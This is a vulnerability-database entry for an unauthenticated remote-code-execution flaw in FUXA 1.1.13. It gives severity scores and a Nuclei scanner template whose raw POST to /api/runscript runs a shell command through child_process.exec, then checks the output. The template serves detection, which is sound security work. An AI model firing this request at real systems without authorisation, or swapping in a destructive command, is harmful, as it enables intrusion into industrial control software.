Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-33831
HistoryOct 01, 2023 - 4:19 p.m.

FUXA - Unauthenticated Remote Code Execution

2023-10-0116:19:18
ProjectDiscovery
github.com
32
fuxa
unauthenticated
remote code execution
frangoteam
cve2023
intrusive

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.182 Low

EPSS

Percentile

96.2%

A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
id: CVE-2023-33831

info:
  name: FUXA - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33831
    - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
    - https://github.com/codeb0ss/CVE-2023-33831-PoC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33831
    cwe-id: CWE-77
    epss-score: 0.21555
    epss-percentile: 0.96432
    cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: frangoteam
    product: fuxa
    fofa-query:
      - title="FUXA"
      - title="fuxa"
  tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/runscript HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
      - |
        GET /_images/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Script OK:'

      - type: word
        part: body_2
        words:
          - 'uid'
          - 'gid'
          - 'groups'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203ecc9e2539c4ae2f8e80d3d097bd798fb303f0d202dbb192204c255ee474b6ea022100fb05e48650addf82e05cd993eb891e678cccb6e80b9780fb1215286f02fc549f:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.182 Low

EPSS

Percentile

96.2%